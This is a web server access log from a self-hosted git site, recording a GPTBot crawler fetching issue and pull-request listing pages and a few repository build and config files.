"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:19:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:19:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:19:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11606] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:19:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" -[17/Feb/2026:19:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11584] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json?display=source" [Client 74.7.227.38] [Length 11583] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:19:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:19:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 